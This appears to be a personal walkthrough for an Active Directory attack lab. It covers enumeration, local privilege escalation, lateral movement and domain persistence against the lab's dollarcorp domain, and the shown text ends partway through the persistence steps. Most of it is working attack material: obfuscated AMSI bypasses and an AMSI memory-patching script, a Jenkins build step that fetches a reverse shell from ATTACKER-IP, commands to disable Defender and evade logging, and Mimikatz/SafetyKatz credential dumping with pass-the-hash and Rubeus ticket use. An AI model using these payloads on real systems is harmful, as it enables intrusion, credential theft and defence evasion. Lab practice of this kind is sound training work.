S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

- You need to turn off Tamper Protection on the student VM after getting a user shell or performing local privilege escalation (check Google on how to do this)
- Sometimes you need to press the **"Enter"** key to see the result of commands like netcat, Rubeus, Mimikatz etc.
- If most attacks, especially in domain persistence, don't work, just **reboot the student VM**; you must have created a lot of tickets 😭


# **Things to do once you have a User First**


- Start a PowerShell session
  using Invisi-Shell to avoid enhanced logging


```powershell
# do this on MS-DOS (cmd.exe)
C:\users\studentx> cd \AD\Tools

C:\users\studentx> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# You should now have a PowerShell session
```

- Use the AMSI bypass payload now
- Load `PowerView` in the PowerShell session.


```powershell
. C:\AD\Tools\PowerView.ps1
```



# **Enumeration**

> [!bug] **Learning Objective 1**
> - Enumerate the following for the dollarcorp domain:
>   - Users
>   - Computers
>   - Domain Administrators
>   - Enterprise Administrators
>   - Shares
> # Solution -:

### **Users**

```powershell
# PowerView (both commands list the same accounts)
# The first also shows logonCount, which helps spot decoy accounts (never logged on)

Get-DomainUser -Properties samaccountname,logonCount
Get-DomainUser | select -ExpandProperty samaccountname
```


### **Computers**


```powershell
# PowerView
# computer account names (the 'Name' attribute)
Get-DomainComputer | select Name

# fully qualified host names; use these for remoting and UNC paths
Get-DomainComputer | select -ExpandProperty dnshostname
```




### **Domain Admins**


```powershell
# PowerView
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# The most important pieces of information in the output (note them down) -:
# MemberName
# MemberSID
```



### **Enterprise Admins**



```powershell
# PowerView
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# If you don't get any output from the above command, note that
# we need to query the root domain: the Enterprise Admins group exists only in
# the root domain of a forest.

Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

# Also note down MemberName and MemberSID
```




### **Shares**



```powershell
# PowerView
Invoke-ShareFinder -Verbose

# See the content of the shares found
# dir "\\dcorp-std520.dollarcorp.moneycorp.local\ADMIN$\"
dir "\\dnshostname\sharename"
```



> [!bug] **Learning Objective 2**
> - Enumerate the following for the dollarcorp domain
>   - List all the OUs
>   - List all the computers in the StudentMachines OU.
>   - List all the GPOs
>   - Enumerate GPO applied on the StudentMachines OU
> # Solution -:

### **List All Organizational Units**


```powershell
# PowerView
Get-DomainOU

# Use the -Properties option to show just the name
Get-DomainOU -Properties Name
```


### **List all the computers in an OU (here StudentMachines)**


```powershell
# PowerView
# Get the OU name first
Get-DomainOU -Properties Name

# Then list all computers under it, using the OU's distinguished name as the LDAP search base
(Get-DomainOU -Identity ).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
```




### **List all the GPOs**



```powershell
# PowerView
Get-DomainGPO
```




### **Enumerate GPO applied on the StudentMachines OU**


```powershell
# PowerView
# Get the OU name first
Get-DomainOU -Properties Name

# Grab the specific OU
Get-DomainOU -Identity StudentMachines
# copy the GUID from the "gplink" property, which looks like "[LDAP://cn={Copy-This},cn=policies,...;0]"

# Get the GPO applied
Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}'
```


> [!bug] **Learning Objective 3**
> - Enumerate the following for the dollarcorp domain:
>   - ACL for the Users group
>   - ACL for the Domain Admins group
>   - All modify rights/permissions for the student
> # Solution -:




### **ACL for the Users group**


```powershell
# PowerView
Get-DomainObjectAcl -Identity "Users" -ResolveGUIDs -Verbose
```



### **ACL for the Domain Admins group**


```powershell
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
```



### **All modify rights/permissions for the student**


```powershell
# PowerView
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student505"}
```



### **Active Directory rights for the RDPUsers group**



```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
```



> [!bug] **Learning Objective 4**
> - Enumerate all domains in the moneycorp.local forest.
> - Map the trusts of the dollarcorp.moneycorp.local domain.
> - Map external trust in the moneycorp.local forest.
> - Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest ?
> # Solution -:

### **Get all domains in the current forest**



```powershell
Get-ForestDomain -Verbose

# The "Name" property holds the domain names
# Or just filter by Name
Get-ForestDomain -Verbose | select Name
```


### **Map the trusts of all domains**


```powershell
# PowerView
Get-DomainTrust

# Map the trusts of a specific domain
Get-ForestDomain -Verbose | select Name
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local

# Output you should look out for -:
# SourceName
# TargetName
# TrustAttributes
# TrustDirection
```



### **Map external trusts in the moneycorp.local forest**


```powershell
# External trusts are SID-filtered (quarantined) by default, hence the FILTER_SIDS attribute
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
```




### **Identify external trusts of the dollarcorp domain**



```powershell
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
```


### **Trust Direction for the trust between dollarcorp.moneycorp.local and eurocorp.local**


```powershell
# We can enumerate the other forest only if it trusts us: "TrustDirection" from the previous
# command must be Bidirectional, or Inbound (eurocorp is the trusting forest, we are the trusted one)

Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}
```



![](https://i.imgur.com/bIp4vE2.png)




# **Local Privilege Escalation**



> [!bug] **Learning Objective 5**
> - Exploit a service on dcorp-studentx and elevate privileges to local administrator.
> - Identify a machine in the domain where studentx has local administrative access.
324 | > - Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server 325 | > # Solution -: 326 | 327 | 328 | 329 | 330 | ### **Get services with unquoted paths and a space in their name {Exploit}** 331 | 332 | 333 | - Cd to `C:\AD\Tools` 334 | - Load Invisi-shell 335 | - Load AMSI Bypass 336 | - Load `Powerup.ps1` script 337 | 338 | 339 | ```powershell 340 | . 'C:\Ad\Tools\PowerUp.ps1' 341 | ``` 342 | 343 | 344 | - Run the `Get-ServiceUnquoted` module to check for unquoted path 345 | 346 | 347 | ```powershell 348 | Invoke-AllChecks 349 | 350 | # Note down the "ServiceName:" with unquoted paths 351 | ``` 352 | 353 | 354 | - Then abuse function for `Invoke-ServiceAbuse` and add our current domain user to the local Administrators group 355 | 356 | 357 | ```powershell 358 | # -Name: Name of service to abuse 359 | # -Username: Name of current user, Just run the whoami cmd 360 | Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose 361 | ``` 362 | 363 | We can see that the dcorp\studentx is a local administrator now. Just logoff and logon again and we have local administrator privileges! 364 | 365 | 366 | 367 | 368 | ### **Identify a machine in the domain where present user has local administrative access** 369 | 370 | 371 | 372 | - Cd to `C:\AD\Tools` 373 | - Load Invisi-shell 374 | - Load AMSI Bypass 375 | - Load `Find-PSRemotingLocalAdminAccess.ps1` script 376 | 377 | 378 | ```powershell 379 | . 
C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 380 | ``` 381 | 382 | 383 | 384 | 385 | 386 | - Fond local administrative access 387 | 388 | 389 | ```powershell 390 | Find-PSRemotingLocalAdminAccess 391 | ``` 392 | 393 | 394 | 395 | ![](https://i.imgur.com/6LJp7ia.png) 396 | 397 | 398 | 399 | - We can the connect to the machines found using `winrs` or `Enter-PSSession`(Powershell Remoting) 400 | 401 | 402 | 403 | ```powershell 404 | # winrs 405 | winrs -r:dcorp-adminsrv cmd 406 | set username 407 | set computername 408 | 409 | # powershell remoting 410 | Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.loca 411 | $env:username 412 | ``` 413 | 414 | 415 | 416 | ![](https://i.imgur.com/8ZevFtw.png) 417 | 418 | 419 | 420 | 421 | ### **Jenkins** 422 | 423 | 424 | - Navigate to the Jenkins instance `http://172.16.3.11:8080` 425 | - Log in with default credentials, in this case `build:build`, or check google for **default Jenkins credentials** 426 | - Turn off all windows firewall settings 427 | - Start up `hfs.exe` (HTTP File Server) located under `C:\AD\Tools\` 428 | - Navigate to `/job/Project0/configure` (If you get a `403` keep changing Project0 to Project1, Pro...2, ..........3 till you get a `200`) 429 | - Scroll down to the option "**Build steps**" and on the drop down select/add "**Execute Windows Batch Command**" and enter-: 430 | 431 | ```powershell 432 | powershell iex (iwr -UseBasicParsing http://ATTACKER-IP/Invoke-PowerShellTcp.ps1);power -Reverse -IPAddress ATTACKER-IP -Port 443 433 | 434 | # Replace attacker IP with your IP Address, Run "ipconfig" to see it 435 | ``` 436 | 437 | - Start up your listener with `netcat.exe` 438 | 439 | ```powershell 440 | C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 441 | ``` 442 | 443 | 444 | - Hit **Apply** and then **Save** and on the left side bar, you should see a **Build Now** button, Click it. 
445 | - You should then see your reverse shell as `dcorp-ci` 446 | 447 | 448 | 449 | ![](https://i.imgur.com/Hf381f0.png) 450 | 451 | 452 | 453 | 454 | 455 | # **Enumeration - Bloodhound** 456 | 457 | 458 | > [!bug] **Learning Objective 6** 459 | > - Setup BloodHound and identify shortest path to Domain Admins in the dollarcorp domain. 460 | > # Solution -: 461 | 462 | 463 | 464 | 465 | **The Reason why this enumeration is coming after Local Privilege Escalation is because we need some administrative rights to run this type of enumeration** 466 | 467 | 468 | ### **BloodHound New Setup** 469 | 470 | - BloodHound uses **neo4j** graph database, so we need to setup that first. 471 | - Go ahead open this location on MS-DOS 472 | 473 | 474 | ```powershell 475 | cd C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin 476 | ``` 477 | 478 | 479 | - Install and start the neo4j service as follows: 480 | 481 | 482 | ```powershell 483 | .\neo4j.bat install-service 484 | .\neo4j.bat start 485 | ``` 486 | 487 | 488 | - Browse to the **neo4j** service on `localhost:7474/browser/` on your browser 489 | - Enter the username: **neo4j** and password: **neo4j**. 490 | - You also need to enter a new password. Let's use BloodHound as the new password. 
- We also need to power on BloodHound. Change directory to:

```powershell
cd C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64
.\BloodHound.exe
```

- Provide the **neo4j** username and password we created earlier

```
bolt://localhost:7687

Username: neo4j
Password: bloodhound
```

- Now, since we have local administrator privileges, go ahead and turn off antivirus (both **Real time protection** and **Tamper Protection**) using the GUI
- Open another PowerShell session with local administrative privileges and load **Invisi-Shell**

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
cd C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors
```

- Bypass **.NET AMSI** with the script below:

```powershell
$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('ams
;i.dll'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('AmsiSca
;nBuffer'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
```

- Start the BloodHound collector to gather data

```powershell
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose
```

- Navigate to the BloodHound collector directory in the GUI

```
Location:

C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors
```

- You should see a zip file; drag and drop it onto the BloodHound UI

![](https://i.imgur.com/9Wd253Y.png)

### **BloodHound Old Setup**

**The latest version of BloodHound (4.2.0) does not show the Derivative Local Admin edge in the GUI. The last version where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can use it the same way as above.**

- Make sure the **neo4j** UI is still turned off, but you can turn off the newer BloodHound
- Change directory to the old BloodHound using MS-DOS and start BloodHound

```powershell
cd C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64
.\BloodHound.exe
```

- Now, since we have local administrator privileges, go ahead and turn off antivirus (both **Real time protection** and **Tamper Protection**) using the GUI
- Open another PowerShell session with local administrative privileges and load **Invisi-Shell**

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
cd C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-master\Collectors
```

- Bypass **.NET AMSI** with the script below:

```powershell
$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('ams
;i.dll'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('AmsiSca
;nBuffer'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
```

- Start the BloodHound collector to gather data

```powershell
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
```

- Now clear the database if there is any data left from the old BloodHound UI
- Navigate to the BloodHound collector directory in the GUI and drag and drop the zip file onto the Bloodhound_old UI

```
Location:

C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-master\Collectors
```

### **Shortest path to Domain Admins in the dollarcorp domain - bloodhound**

**Note -: This can only be done with the old BloodHound UI**

- In Node Info, scroll down to '**LOCAL ADMIN RIGHTS**' and expand '**Derivative Local Admin Rights**' to find out if studentx has derivative local admin rights on any machine!
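To make the Derivative Local Admin Rights edge concrete, here is an added example (not part of the lab material or of BloodHound) that computes the same reachability over a small constructed edge list modelled on the dollarcorp path in this section; the function names and the edges are assumptions for illustration.

```powershell
# Added example, not from the lab: how 'Derivative Local Admin Rights' is derived.
# Edge kinds follow BloodHound's model: a user is MemberOf a group, a principal is
# AdminTo a computer, and a computer HasSession for a user whose credentials live
# on it. The edges below are a constructed sample modelled on this section's path.
$script:SampleEdges = @(
    @{ From = 'STUDENT505';     Kind = 'MemberOf';   To = 'RDPUSERS' }
    @{ From = 'RDPUSERS';       Kind = 'AdminTo';    To = 'DCORP-ADMINSRV' }
    @{ From = 'DCORP-ADMINSRV'; Kind = 'HasSession'; To = 'SRVADMIN' }
    @{ From = 'SRVADMIN';       Kind = 'AdminTo';    To = 'DCORP-MGMT' }
    @{ From = 'DCORP-MGMT';     Kind = 'HasSession'; To = 'SVCADMIN' }
    @{ From = 'SVCADMIN';       Kind = 'MemberOf';   To = 'DOMAIN ADMINS' }
)

function Find-DerivativePath {
    # Breadth-first search from $Start to $Target; returns the edges of the shortest
    # path in order, or $null when $Target cannot be reached.
    param(
        [Parameter(Mandatory)][string]$Start,
        [Parameter(Mandatory)][string]$Target,
        [hashtable[]]$Edges = $script:SampleEdges
    )
    $queue   = [System.Collections.Generic.Queue[string]]::new()
    $parent  = @{}                     # node -> edge that first reached it
    $visited = @{}
    $visited[$Start] = $true
    $queue.Enqueue($Start)

    while ($queue.Count -gt 0) {
        $node = $queue.Dequeue()
        if ($node -eq $Target) { break }
        foreach ($e in ($Edges | Where-Object { $_.From -eq $node })) {
            if (-not $visited.ContainsKey($e.To)) {
                $visited[$e.To] = $true
                $parent[$e.To]  = $e
                $queue.Enqueue($e.To)
            }
        }
    }
    if (-not $parent.ContainsKey($Target)) { return $null }

    # Walk the parent links back from the target to rebuild the path front to back.
    $path = [System.Collections.Generic.List[object]]::new()
    $cur = $Target
    while ($cur -ne $Start) {
        $e = $parent[$cur]
        $path.Insert(0, $e)
        $cur = $e.From
    }
    return $path
}

function Get-DerivativeLocalAdmin {
    # Every computer reachable from $Start through any chain of edges that ends in an
    # AdminTo edge: the set the 'Derivative Local Admin Rights' panel lists.
    param(
        [Parameter(Mandatory)][string]$Start,
        [hashtable[]]$Edges = $script:SampleEdges
    )
    $seen = @{}
    $seen[$Start] = $true
    $stack = [System.Collections.Generic.Stack[string]]::new()
    $stack.Push($Start)
    while ($stack.Count -gt 0) {
        $n = $stack.Pop()
        foreach ($e in ($Edges | Where-Object { $_.From -eq $n })) {
            if (-not $seen.ContainsKey($e.To)) {
                $seen[$e.To] = $true
                $stack.Push($e.To)
            }
        }
    }
    $Edges | Where-Object { $_.Kind -eq 'AdminTo' -and $seen.ContainsKey($_.From) } |
        ForEach-Object { $_.To } | Sort-Object -Unique
}

# Computers STUDENT505 is a derivative local admin of, on the sample graph.
Get-DerivativeLocalAdmin -Start 'STUDENT505'

# Shortest path to Domain Admins, printed one edge per line.
Find-DerivativePath -Start 'STUDENT505' -Target 'DOMAIN ADMINS' |
    ForEach-Object { '{0} -[{1}]-> {2}' -f $_.From, $_.Kind, $_.To }
```

On the sample graph the second call walks the same chain the screenshot shows, which is why dcorp-mgmt turns up as a second derivative admin target later in this section.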
![](https://i.imgur.com/zkLtx5h.png)

- As we can see below, `student505` is a member of the `RDPUSERS` group and `RDPUSERS` is Admin To `DCORP-ADMINSRV` DC

![](https://i.imgur.com/n31oOzy.png)

- This means that if we run `winrs -r:dcorp-adminsrv cmd` we can actually be domain admin

![](https://i.imgur.com/RHI3YZd.png)

# **Lateral Movement - 1. Using dcorp-ci**

> [!bug] **Learning Objective 7**
> - Identify a machine in the target domain where a Domain Admin session is available.
> - Compromise the machine and escalate privileges to Domain Admin
>   - Using access to `dcorp-ci`
>   - Using derivative local admin
> # Solution -:

### **Step 1 - Identify a machine in the target domain where a Domain Admin session is available.**

Remember we got access to `dcorp\ciadmin` via the Jenkins instance; we can use this domain user to enumerate where a domain admin session is available. Go ahead and get a reverse shell with Jenkins again ☹️

![](https://i.imgur.com/z0Fu3jR.png)

- First, we must bypass AMSI and enhanced logging.
- The command below bypasses Enhanced Script Block Logging
- Make sure to set up **HFS** and host `sbloggingbypass.txt` for this

```powershell
iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)
```

![](https://i.imgur.com/6KibfHl.png)

- Bypass AMSI

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

- Download and execute PowerView in the memory of the reverse shell
- Make sure to set up **HFS** for this as well, hosting the `PowerView.ps1` script

```powershell
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))
```

- Then run this command to find a **domain admin session**
- Note that this might take a lot of time, so wait!! 🤣

```powershell
Find-DomainUserLocation
```

![](https://i.imgur.com/mgNGQFW.png)

- Great! There is a domain admin session on the dcorp-mgmt server

> **Note** -: If you don't get a result within 4 minutes, hit the **Enter** key on your keyboard twice and you should see output; otherwise keep waiting till something comes up

### **Step 2 - Abuse using winrs**

**Let's check if we can execute commands on the dcorp-mgmt server and if the WinRM port is open:**

```powershell
winrs -r:dcorp-mgmt hostname;whoami
```

![](https://i.imgur.com/wBUPKu0.png)

**Once this is confirmed we can go ahead and run SafetyKatz.exe on dcorp-mgmt to extract credentials from it** -:

- Download `Loader.exe` on **dcorp-ci** and copy it from there to **dcorp-mgmt**

```powershell
iwr http://172.16.100.x/Loader.exe -OutFile C:\Users\Public\Loader.exe
```

- Copy `Loader.exe` to **dcorp-mgmt**:

```powershell
echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
```

**_Right Output -:_**

![](https://i.imgur.com/oHkafUX.png)

- Using `winrs`, add the following port forwarding on **dcorp-mgmt** to avoid detection on **dcorp-mgmt**

```powershell
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x"

# $null is piped in to work around output redirection issues
```

- Use `Loader.exe` to download and execute `SafetyKatz.exe` in memory on **dcorp-mgmt**
- Make sure to host `SafetyKatz.exe` on **HFS**

```powershell
$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

**_Right Output -:_**
![](https://i.imgur.com/d620Z2B.png)

> We got the credentials of svcadmin - a domain administrator. Note that **svcadmin** is used as a service account, so you can even get credentials in clear-text from lsasecrets!

![](https://i.imgur.com/d7iaV5E.png)

**In case you want to use PowerShell Remoting instead of winrs, you can check out the lab manual**

### **Step 3 - OverPass-the-Hash Rubeus**

We will use **OverPass-the-Hash** to use svcadmin's credentials

- Spawn an elevated shell from the student VM (**Run as Administrator**)

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- You should now see a new window/process come up
- Try accessing the domain controller from the new process!

```powershell
# To run a command remotely
winrs -r:dcorp-dc whoami

# To get an interactive shell
winrs -r:dcorp-dc cmd
```

![](https://i.imgur.com/gwUwl7h.png)

# **Lateral Movement - 2. Using derivative local admin**

**Remember when we used BloodHound to enumerate the shortest path to domain admin and got `dcorp-adminsrv`? Yeah, that is what a derivative local admin is**

- Load Invisi-Shell and the AMSI bypass into your MS-DOS session

![](https://i.imgur.com/KDFf7s8.png)

- Find out the machines on which we have local admin privileges

```powershell
cd C:\AD\Tools

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess
```

**_Example -:_**

![](https://i.imgur.com/rDIDPEa.png)

**We have local admin on dcorp-adminsrv**

- Check if **AppLocker** is configured on `dcorp-adminsrv` by querying **registry keys**

```powershell
# Spawn an interactive shell on dcorp-adminsrv
winrs -r:dcorp-adminsrv cmd

# Query registry keys
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
```

![](https://i.imgur.com/IuN7laB.png)

**We can go ahead and enumerate these registry keys to check if there is a policy that can favor us**

```powershell
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d
```

**_Example_**

![](https://i.imgur.com/2ajE9HQ.png)

**We have got an interesting policy in \Script that allows everyone to run programs, signed binaries and scripts located under "C:\Program Files". That means we can drop scripts in the Program Files directory there and execute them**

- First, disable Windows Defender on the `dcorp-adminsrv` server ^2a8dec
- Before this, exit the `winrm` session and use `PS Remoting`

```powershell
Enter-PSSession dcorp-adminsrv

# Disable Windows Defender real-time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
```

**_Example_**

![](https://i.imgur.com/zlZYDq2.png)

### **Step 1 - Create Invoke-MimiEx.ps1**

- Create a copy of **Invoke-Mimi.ps1** and rename it to **Invoke-MimiEx.ps1**.
- Open **Invoke-MimiEx.ps1** in PowerShell ISE (right click on it and click Edit).
- Add `Invoke-Mimi -Command '"sekurlsa::ekeys"'` to the end of the file.

**_Example_**

![](https://i.imgur.com/OgF704m.png)

- Open a new PowerShell session on the student machine and run the following command to transfer `Invoke-MimiEx.ps1` to **dcorp-adminsrv**

```powershell
Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
```

- Confirm that the file has been transferred

```powershell
[dcorp-adminsrv]: PS C:\Users\student505\Documents> cd 'C:\Program Files\'

[dcorp-adminsrv]: PS C:\Program Files> ls

[SNIP]
-a----       12/11/2023   2:45 PM        2070874 Invoke-MimiEx.ps1
```

- Run the modified mimikatz script on `dcorp-adminsrv`

```powershell
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1
```

> [!summary] **Here we find the credentials (secrets) of the `srvadmin`, `appadmin` and `websvc` users.**

We will use **OverPass-the-Hash** to use **srvadmin's** credentials with `SafetyKatz.exe`

- Spawn an elevated PowerShell from the student VM (**Run as Administrator**)

```powershell
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"
```

- You should now have a new process/shell
- Check if srvadmin has admin privileges on any other machine.

```powershell
# Load Invisi-Shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose
```

**_Example_**

![](https://i.imgur.com/EuTNkRr.png)

**Hell yeah, we discovered a new machine, `dcorp-mgmt`**

### **Step 2 - SafetyKatz for extracting credentials**

- Copy `Loader.exe` to **dcorp-mgmt**:

```powershell
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
```

- Extract credentials
- Make sure to host `SafetyKatz.exe` on **HFS** before running this command

```powershell
winrs -r:dcorp-mgmt cmd

# Launch PowerShell
powershell

# Enable port forwarding
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x"

# Extract credentials
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

**You could also use `PowerShell Remoting`, as shown below**

### **Step 2.1 - Using PS-Remoting**

- Note that you have to exit from the 2 previous sessions by using the `exit` command twice before running the command below

```powershell
# Connect via PS-Remoting
Enter-PSSession -ComputerName dcorp-mgmt
```

- Load the AMSI bypass
- Download and execute Invoke-Mimikatz as follows

```powershell
iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)
```

- Extract credentials

```powershell
# Extract credentials
Invoke-Mimi -Command '"sekurlsa::ekeys"'

# Extract credentials from the Credential Vault
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'
```

### **Step 3 - OverPass-the-Hash Rubeus**

- Spawn an elevated shell from the student VM (**Run as Administrator**)

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- You should now see a new window/process come up as `svcadmin`; run `klist` to confirm
- Try accessing the domain controller from the new process!

```powershell
# To run a command remotely
winrs -r:dcorp-dc whoami

# To get an interactive shell
winrs -r:dcorp-dc cmd
```

**_Things To Note Down_**

- [ ] `aes256_hmac` is mostly used for the **OverPass-The-Hash** attack
- [ ] The **NTLM hash** is called `rc4_hmac_nt`
- [ ] To solve the question `Process using svcadmin as service account` -:
    - You have to `winrs` into **dcorp-mgmt** after getting user `svcadmin`
    - Then run `tasklist /svc` to view processes
    - You should see `sqlservr.exe`; the answer is definitely **sqlserver**

# **Domain Persistence**

> [!bug] **Learning Objective 8**
> - Extract secrets from the domain controller of dollarcorp.
> - Using the secrets of the `krbtgt` account, create a golden ticket.
> - Use the Golden ticket to (once again) get domain admin privileges from a machine
> # Solution -:

### **Extract secrets from the domain controller of dollarcorp**

- First of all, spawn an elevated **MS-DOS** session and start a process with Domain Admin privileges.
```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- From the new process, copy `Loader.exe` to **dcorp-dc** and use it to extract credentials

```powershell
# Copy Loader.exe to the DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn an interactive shell
winrs -r:dcorp-dc cmd

# Set up port forwarding
